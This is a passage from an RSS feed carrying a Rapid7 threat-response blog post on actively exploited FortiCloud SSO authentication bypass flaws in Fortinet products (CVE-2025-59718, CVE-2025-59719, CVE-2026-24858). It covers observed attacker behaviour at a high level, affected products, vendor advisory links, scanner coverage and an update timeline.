FortiSwitchManager.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>While the vulnerable FortiCloud SSO feature is disabled by default in factory settings, it is automatically enabled when a device is registered to FortiCare via the GUI, unless an administrator explicitly opts out. This behavior significantly increases the likelihood of exposure across registered deployments. Arctic Wolf has </span><a href="https://arcticwolf.com/resources/blog/arctic-wolf-observes-malicious-sso-logins-following-disclosure-cve-2025-59718-cve-2025-59719/"><span style='font-size: undefined;'>confirmed</span></a><span style='font-size: undefined;'> active exploitation and CVE-2025-59718 was added to CISA’s Known Exploited Vulnerabilities (KEV) catalog on December 16.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Observed attacks show threat actors authenticating as the admin user and immediately downloading the system configuration file, which often contains hashed credentials. As a result, any organization with indicators of compromise must assume credential exposure and respond accordingly.</span></p><h2 style="direction: ltr;">Rapid7 observations</h2><p>Rapid7 initially observed CVE-2025-59718 exploitation attempts against honeypots on December 17, 2025, alongside a proof-of-concept exploit on GitHub resembling those requests. Update as of January 16, 2026, Rapid7 has identified threat actors actively exploiting authentication bypass vulnerabilities CVE-2025-59718 and CVE-2025-59719 on vulnerable FortiGate devices exposed to the public internet.</p><h2 style="direction: ltr;">Mitigation guidance</h2><p></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE-2025-59718 and CVE-2025-59719:</strong></span></p></li><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Fortinet has </span><a href="https://fortiguard.fortinet.com/psirt/FG-IR-25-647"><span style='font-size: undefined;'>published</span></a><span style='font-size: undefined;'> an advisory that lists fixed versions for CVE-2025-59718 and CVE-2025-59719.</span></p></li></ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE-2026-24858:</strong></span></p></li><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>According to Fortinet’s </span><a href="https://fortiguard.fortinet.com/psirt/FG-IR-26-060"><span style='font-size: undefined;'>advisory</span></a><span style='font-size: undefined;'>, a patch deployed to their own FortiCloud SSO infrastructure on January 26, 2026 has remediated the vulnerability. However, patched software is available for customers, since the cloud-side fix introduces breaking changes to the FortiCloud SSO login protocol. Because of this, fixed versions are listed, along with IoCs from exploitation in the wild.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Per Fortinet, FortiAnalyzer, FortiManager, FortiOS, and FortiProxy are confirmed to be affected, and a vendor investigation is ongoing (as of January 27, 2026) to determine if FortiWeb and FortiSwitchManager are affected.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>For the latest information, please refer to the official Fortinet </span><a href="https://fortiguard.fortinet.com/psirt/FG-IR-26-060"><span style='font-size: undefined;'>advisory</span></a><span style='font-size: undefined;'> for CVE-2026-24858.</span></p></li></ul></ul><h2 style="direction: ltr;">Rapid7 customers</h2><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Exposure Command, InsightVM and Nexpose</span></h3><p>Exposure Command, InsightVM, and Nexpose customers can assess their exposure to CVE-2025-59718 and CVE-2025-59719 with authenticated vulnerability checks available in the December 17 content release.</p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Intelligence Hub</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Customers leveraging Rapid7’s Intelligence Hub can track the latest developments surrounding CVE-2025-59718 and CVE-2025-59719, including indicators of compromise (IOCs).</span></p><h2 style="direction: ltr;">Updates</h2><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>December 17, 2025:</strong></span><span style='font-size: undefined;'> Initial publication.</span></p></li><li><p style="direction: ltr;"><strong>December 17, 2025:</strong> Coverage updated.</p></li><li><span style='font-size: undefined;'><strong>December 18, 2025:</strong></span><span style='font-size: undefined;'> Added Intelligence Hub section.</span></li><li><strong>January 16, 2026:</strong> Active exploitation observed.</li></ul><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>January 26, 2026:</strong></span><span style='font-size: undefined;'> Added information about the January, 2026 advisory blog post and the new recommended mitigation steps.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>January 27, 2026:</strong></span><span style='font-size: undefined;'> Added information about CVE-2026-24858.</span></p></li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/etr-critical-vulnerabilities-in-fortinet-cve-2025-59718-cve-2025-59719-exploited-in-the-wild</link>
      <guid isPermaLink="false">blt4603728e813f376e</guid>
      <category><![CDATA[Emergent Threat Response]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Wed, 17 Dec 2025 21:00:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65a432ba319f4043/6846abddaf18306debe6cf4d/ETR.webp" medium="image" />
    </item>
  </channel>
</rss>